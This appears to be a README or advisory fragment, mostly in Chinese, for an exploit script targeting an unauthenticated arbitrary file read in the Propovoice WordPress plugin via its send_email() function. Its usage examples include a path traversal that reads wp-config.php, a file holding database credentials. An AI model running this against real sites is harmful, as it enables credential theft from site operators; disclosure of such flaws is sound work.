Propovoice <= 1.7.6.7 - 未认证任意文件读取
Propovoice: All-in-One Client Management System WordPress插件在所有版本直至并包括1.7.6.7中,通过send_email()函数存在任意文件读取漏洞。这使得未认证攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php